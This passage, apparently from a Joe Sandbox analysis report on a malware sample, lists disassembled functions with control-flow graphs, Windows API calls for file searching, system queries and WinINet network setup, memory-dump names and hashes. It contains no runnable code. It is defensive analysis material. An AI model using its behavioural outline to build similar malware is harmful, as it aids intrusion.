36549a-3654ab call 3617f0 8065->8132 8068->8057 8069->8072 8070->8073 8071->8058 8086 3650ae-3650b4 8072->8086 8087 36509b-3650ac 8072->8087 8080 365002-365008 8073->8080 8081 364fef-365000 8073->8081 8098 36500b-365024 call 3666e0 8080->8098 8081->8098 8097 3650b7-3650cd call 3666e0 8086->8097 8087->8097 8091->8035 8092->8117 8097->7990 8098->7990 8117->7998 8120->8083 8137 365384-3653b6 call 35edc0 call 356470 call 35edc0 * 2 8120->8137 8121->8048 8122->8132 8132->8083 8144 3654b1-3654e3 call 35edc0 call 356470 call 35edc0 * 2 8132->8144 8137->7998 8144->7998
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: array$object$object key$object separator
                                                                                                                                                                                            • API String ID: 0-2277530871
                                                                                                                                                                                            • Opcode ID: b92b8ad7224a4335977c17e5c1221d04afa4593d451359ed47203ffd71e1d8ff
                                                                                                                                                                                            • Instruction ID: 7ac756d5a10d66171ab14d7221afe25d0cffc25b06c5530be82e21ce5fc8f168
                                                                                                                                                                                            • Opcode Fuzzy Hash: b92b8ad7224a4335977c17e5c1221d04afa4593d451359ed47203ffd71e1d8ff
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1512C4705187859FD32ADF24C851BAAB7F8BF85300F408A2DF586C7595EB70E644CB92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00370B19 Relevance: 3.9, APIs: 2, Instructions: 881COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 8fa6bcf462dfe101e1eee8081a6e4d369413400781b65f1a12225bf0fe7639ae
                                                                                                                                                                                            • Instruction ID: 3530133dad9da70c22d5e75e91a037eb711af09fdc3ae58dccd99d9f76481fd2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fa6bcf462dfe101e1eee8081a6e4d369413400781b65f1a12225bf0fe7639ae
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9182B3315183808FE73EDF28C895BEFB7E1BF85304F148A1DE4895B6A1DB7895858B42
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003701C0 Relevance: 3.6, APIs: 2, Instructions: 626fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FindFirstFileA.KERNELBASE ref: 0037023D
                                                                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,?), ref: 0037033D
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileFindFirstMatchPathSpec
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1021465796-0
                                                                                                                                                                                            • Opcode ID: c2fa82ba05be4062dc3c8764b1f0d3452e4bb7a2d3cbc79b22f6fbb16bb8d2f6
                                                                                                                                                                                            • Instruction ID: 18dcc769bdddb8a73d52412f7ddc111a99fa08d48ec4f70c865f3015524b28e2
                                                                                                                                                                                            • Opcode Fuzzy Hash: c2fa82ba05be4062dc3c8764b1f0d3452e4bb7a2d3cbc79b22f6fbb16bb8d2f6
                                                                                                                                                                                            • Instruction Fuzzy Hash: DA42E471508380CBD73ACF28C8947ABB7E1BFC5314F148A5CE4999B2A2D775D985CB82
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0036B4B0 Relevance: 3.6, APIs: 2, Instructions: 585libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 9316 36b4b0-36b51e call 356f10 call 35e940 9321 36b524-36b52d 9316->9321 9322 36bcac call 37b1dd 9316->9322 9323 36b531-36b565 call 356f10 call 374780 9321->9323 9324 36b52f 9321->9324 9327 36bcb1 call 380fd8 9322->9327 9335 36b596-36b63a call 356f10 call 35e940 call 35fa30 call 374650 call 356f10 call 35e940 9323->9335 9336 36b567-36b576 9323->9336 9324->9323 9331 36bcb6 call 37b1dd 9327->9331 9334 36bcbb-36bcc0 call 380fd8 9331->9334 9335->9331 9355 36b640-36b649 9335->9355 9338 36b58c-36b593 call 374ea2 9336->9338 9339 36b578-36b586 9336->9339 9338->9335 9339->9327 9339->9338 9356 36b64d-36b686 call 356f10 LoadLibraryA 9355->9356 9357 36b64b 9355->9357 9361 36b6b7-36b73d call 356f10 call 35e940 call 35fa30 call 374650 9356->9361 9362 36b688-36b697 9356->9362 9357->9356 9377 36b7a4-36b7c8 9361->9377 9378 36b73f-36b75d call 356f10 9361->9378 9363 36b6ad-36b6b4 call 374ea2 9362->9363 9364 36b699-36b6a7 9362->9364 9363->9361 9364->9334 9364->9363 9388 36b81c-36b855 call 356f10 9377->9388 9389 36b7ca 9377->9389 9382 36b78f-36b7a1 call 374a11 9378->9382 9383 36b75f-36b76f 9378->9383 9385 36b785-36b78c call 374ea2 9383->9385 9386 36b771-36b77f 9383->9386 9385->9382 9386->9385 9390 36bca7 call 380fd8 9386->9390 9400 36bba7-36bbad 9388->9400 9401 36b85b 9388->9401 9393 36b7d0-36b7d6 9389->9393 9390->9322 9397 36b7e6-36b7f1 call 368f50 9393->9397 9398 36b7d8-36b7e4 9393->9398 9402 36b7f6-36b81a 9397->9402 9398->9402 9405 36bc10-36bc1d 9400->9405 9406 36bbaf-36bbb4 9400->9406 9404 36b860-36b898 9401->9404 9402->9388 9402->9393 9425 36b8a0-36b8a9 9404->9425 9407 36bc1f-36bc39 9405->9407 9408 36bc3b-36bc4a call 35ff80 9405->9408 9409 36bbb6-36bbc8 9406->9409 9410 36bbca-36bbd5 9406->9410 9413 36bc4f-36bc77 9407->9413 9408->9413 9415 36bc0d 9409->9415 9416 36bbd7-36bbf9 call 376750 9410->9416 9417 36bbfb-36bc08 call 360220 9410->9417 9413->9382 9419 36bc7d-36bc8d 9413->9419 9415->9405 9416->9415 9417->9415 9419->9385 9423 36bc93-36bca1 9419->9423 9423->9385 9423->9390 9425->9425 9426 36b8ab-36b8cf call 36eb70 9425->9426 9429 36b8d0-36b8d9 9426->9429 9429->9429 9430 36b8db-36b921 call 374ed3 WideCharToMultiByte 9429->9430 9433 36b924-36b929 9430->9433 9433->9433 9434 36b92b-36b9ac call 356f10 call 36f050 9433->9434 9439 36b9ae-36b9d6 9434->9439 9440 36b9d8-36b9e7 call 35ff80 9434->9440 9441 36b9ec-36ba40 9439->9441 9440->9441 9443 36ba42-36ba6b call 376ca0 9441->9443 9444 36ba6d-36ba7c call 35ff80 9441->9444 9449 36ba82-36ba8b 9443->9449 9444->9449 9450 36ba8d-36ba98 9449->9450 9451 36bab8-36bac1 9449->9451 9452 36baae-36bab5 call 374ea2 9450->9452 9453 36ba9a-36baa8 9450->9453 9454 36baf2-36bb16 9451->9454 9455 36bac3-36bad2 9451->9455 9452->9451 9453->9327 9453->9452 9459 36bb47-36bb4d 9454->9459 9460 36bb18-36bb27 9454->9460 9457 36bad4-36bae2 9455->9457 9458 36bae8-36baef call 374ea2 9455->9458 9457->9327 9457->9458 9458->9454 9461 36bb81-36bb9b 9459->9461 9462 36bb4f-36bb61 9459->9462 9465 36bb3d-36bb44 call 374ea2 9460->9465 9466 36bb29-36bb37 9460->9466 9461->9404 9469 36bba1 9461->9469 9467 36bb77-36bb7e call 374ea2 9462->9467 9468 36bb63-36bb71 9462->9468 9465->9459 9466->9327 9466->9465 9467->9461 9468->9327 9468->9467 9469->9400
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036B679
                                                                                                                                                                                              • Part of subcall function 00356F10: Concurrency::cancel_current_task.LIBCPMT ref: 00356FE5
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,00000001,?,?,?,?,003A3D14,00000001), ref: 0036B8FB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharConcurrency::cancel_current_taskLibraryLoadMultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1730022097-0
                                                                                                                                                                                            • Opcode ID: 4fc5cbf6183f1f165b16da5200c135830c097e80932db5f47ca30336e4c517b9
                                                                                                                                                                                            • Instruction ID: 3770dbd927c79637d86d184d3ac05a465f9124143cfe645679b3aa188118a4bd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fc5cbf6183f1f165b16da5200c135830c097e80932db5f47ca30336e4c517b9
                                                                                                                                                                                            • Instruction Fuzzy Hash: A332E631E102188BDB1ADF24CC95BEDB775FF4A304F148299E409AB295DB74AAC5CF90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0035D7D0 Relevance: 3.5, APIs: 2, Instructions: 530COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 419b73d1114cafdf75a183c171001977a78087d38d1c1d05a48007f4e2ee6705
                                                                                                                                                                                            • Instruction ID: 01ad8d3c90c4ceeaaec03aedf7c3d888dbbaec641c2f2e4da4fbef9203726440
                                                                                                                                                                                            • Opcode Fuzzy Hash: 419b73d1114cafdf75a183c171001977a78087d38d1c1d05a48007f4e2ee6705
                                                                                                                                                                                            • Instruction Fuzzy Hash: A622D1305183818FD72ADF24C855FABB7E1BF85305F104A1CF8895B6A2DB749689CB82
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0035D8C1 Relevance: 3.5, APIs: 2, Instructions: 468COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0035D9D3
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1514166925-0
                                                                                                                                                                                            • Opcode ID: cc34e60892831da60e073398214a90cc232b70765189d7437be36bc63dae1f5c
                                                                                                                                                                                            • Instruction ID: a30c4d7611020a519c870c4763ebbf64345f9d8010c608cdee6dc54762a667b1
                                                                                                                                                                                            • Opcode Fuzzy Hash: cc34e60892831da60e073398214a90cc232b70765189d7437be36bc63dae1f5c
                                                                                                                                                                                            • Instruction Fuzzy Hash: F712F3305183808FD72ADF24C895FAEB7E1BF95305F144A4CF8855B6B2DB749689CB82
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0036BE50 Relevance: 1.6, APIs: 1, Instructions: 133nativeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?,?,?), ref: 0036BF78
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InformationQuerySystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3562636166-0
                                                                                                                                                                                            • Opcode ID: 12fa1801f7db296e48f1fcbd30c9a1bf67f08a1a76780d55145160ed036e575c
                                                                                                                                                                                            • Instruction ID: 819228433ca34e07801af3400406decfa3c380285e9dd1d46407fa4f9baedcfe
                                                                                                                                                                                            • Opcode Fuzzy Hash: 12fa1801f7db296e48f1fcbd30c9a1bf67f08a1a76780d55145160ed036e575c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 50411730F003448BDB0AAFB4CC46BAEB7B5EF41304F608619F4059F2A6DB75A9C58B91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0036BCD0 Relevance: 1.6, APIs: 1, Instructions: 122nativeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?,?,?), ref: 0036BDF8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InformationQuerySystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3562636166-0
                                                                                                                                                                                            • Opcode ID: 54263fb0e8418457b89b24ab5d248f00b93821a4dd0bda96c6aee0af78bc91fe
                                                                                                                                                                                            • Instruction ID: 51ae97fe40d8338fef5e5c18f1a8135abaf37d39f5ed5bc244042da8ebc2cd60
                                                                                                                                                                                            • Opcode Fuzzy Hash: 54263fb0e8418457b89b24ab5d248f00b93821a4dd0bda96c6aee0af78bc91fe
                                                                                                                                                                                            • Instruction Fuzzy Hash: F9412930E002049BDB0AAF70DC45BAEB7B5EF45304F50864DF901AF2D2DBB5A9848BA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00355340 Relevance: .4, Instructions: 401COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 5a5eb47d894c4dc21f9510ac2c5b7ecc00d4592f5d8df4316975112a2377079b
                                                                                                                                                                                            • Instruction ID: d10bc94119bbb9d08299417e9676bf2be8960b213dfe0cc0747b33e3bdb18779
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a5eb47d894c4dc21f9510ac2c5b7ecc00d4592f5d8df4316975112a2377079b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 29F1AEB1A01B048FDB25CF29C850BAAB7F5FF48315F14066DD9AA97760E770B948CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00360530 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 444COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3314 360530-360568 3315 3608e6-36091a call 364840 3314->3315 3316 36056e-3605e9 call 376750 3314->3316 3320 36091f-36092d call 3619f0 3315->3320 3331 36060f-360643 call 35ef10 3316->3331 3332 3605eb-360608 3316->3332 3324 360933-3609b3 call 356f10 call 3612d0 call 364590 call 3617f0 3320->3324 3325 360abe-360ac6 3320->3325 3371 360ba1 call 37b1dd 3324->3371 3372 3609b9-3609c0 3324->3372 3327 360b61-360b6a 3325->3327 3328 360acc-360b19 call 35ef10 call 35f110 3325->3328 3333 360b6c-360b80 3327->3333 3334 360b4b-360b5e call 374a11 3327->3334 3328->3334 3357 360b1b-360b2f 3328->3357 3352 360645-36064b 3331->3352 3353 360661-360668 3331->3353 3332->3331 3340 360b82-360b90 3333->3340 3341 360b41-360b48 call 374ea2 3333->3341 3340->3341 3348 360b92 call 380fd8 3340->3348 3341->3334 3355 360b97 call 37b1dd 3348->3355 3352->3353 3360 36064d-36065f 3352->3360 3356 36066b-360690 call 363370 3353->3356 3365 360b9c call 380fd8 3355->3365 3369 360692-3606af 3356->3369 3370 3606b8-3606d9 call 363b90 call 3619f0 3356->3370 3357->3341 3363 360b31-360b3f 3357->3363 3360->3356 3363->3341 3363->3348 3365->3371 3369->3370 3392 3606df-36076b call 356f10 call 3612d0 call 364590 call 3617f0 3370->3392 3393 36086d-360875 3370->3393 3378 360ba6-360bab call 380fd8 3371->3378 3374 3609c2-3609cf 3372->3374 3375 3609ef-360a44 call 3762df * 2 3372->3375 3379 3609e5-3609ec call 374ea2 3374->3379 3380 3609d1-3609df 3374->3380 3394 360a46-360a53 3375->3394 3395 360a73-360a8f 3375->3395 3379->3375 3380->3378 3380->3379 3392->3355 3425 360771-360778 3392->3425 3396 360877-360879 3393->3396 3397 36087b-36087e 3393->3397 3399 360a55-360a63 3394->3399 3400 360a69-360a70 call 374ea2 3394->3400 3395->3325 3401 360a91-360a9e 3395->3401 3402 360882-3608bf call 35ef10 call 35f110 3396->3402 3403 3608c4-3608e3 call 3611a0 call 374a11 3397->3403 3404 360880 3397->3404 3399->3378 3399->3400 3400->3395 3410 360ab4-360abb call 374ea2 3401->3410 3411 360aa0-360aae 3401->3411 3402->3403 3404->3402 3410->3325 3411->3378 3411->3410 3426 3607a7-3607ed call 3762df * 2 3425->3426 3427 36077a-360787 3425->3427 3436 3607ef-3607fc 3426->3436 3437 36081c-36083b 3426->3437 3428 36079d-3607a4 call 374ea2 3427->3428 3429 360789-360797 3427->3429 3428->3426 3429->3365 3429->3428 3438 360812-360819 call 374ea2 3436->3438 3439 3607fe-36080c 3436->3439 3437->3393 3440 36083d-36084d 3437->3440 3438->3437 3439->3365 3439->3438 3442 360863-36086a call 374ea2 3440->3442 3443 36084f-36085d 3440->3443 3442->3393 3443->3365 3443->3442
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 003607C9
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 003607DE
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 00360A17
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 00360A32
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_destroy
                                                                                                                                                                                            • String ID: Te9$Te9$Te9$Te9$value
                                                                                                                                                                                            • API String ID: 4194217158-3765628305
                                                                                                                                                                                            • Opcode ID: 5831184942f191d3132d9b05f1719b2d04a2124b38ab72436e745df4424e6d30
                                                                                                                                                                                            • Instruction ID: 53df12632cbc5962fd5bb12a81826ca80cc0718b5181505b18188f408e7bec85
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5831184942f191d3132d9b05f1719b2d04a2124b38ab72436e745df4424e6d30
                                                                                                                                                                                            • Instruction Fuzzy Hash: F202E3715183808FD32ADB24C895BAFBBE5BFC5304F048A1DF48997395D774A984CB92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003564A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 61networkCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00374780: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,00000000,811C9DC5,00000000), ref: 00374832
                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,4DDDE966,00000000,E23B96E7,00000000,960CB4C6,?,00000000,?,?,0035D592,?,00000009), ref: 00356507
                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Wininet.dll,?,00000000,?,?,0035D592,?,00000009), ref: 00356514
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,0035D592,?,00000009), ref: 0035651D
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,0035D592,?,00000009), ref: 00356524
                                                                                                                                                                                            • InternetOpenA.WININET(?,00000000,?,?,0035D592,?,00000009), ref: 00356548
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FreeHandleLibraryModule$ByteCharInternetMultiOpenWide
                                                                                                                                                                                            • String ID: Kernel32.dll$Wininet.dll$Wininet.dll$kernel32.dll
                                                                                                                                                                                            • API String ID: 17917458-2727469521
                                                                                                                                                                                            • Opcode ID: 85353d1a34a9b932a1228865b1727c0bac12c451b0290e9c134dc85bb27a57f9
                                                                                                                                                                                            • Instruction ID: 582da0b8b8d2ccb02e4683e2ba918d13ccd24f779587008e1658040bfcb09523
                                                                                                                                                                                            • Opcode Fuzzy Hash: 85353d1a34a9b932a1228865b1727c0bac12c451b0290e9c134dc85bb27a57f9
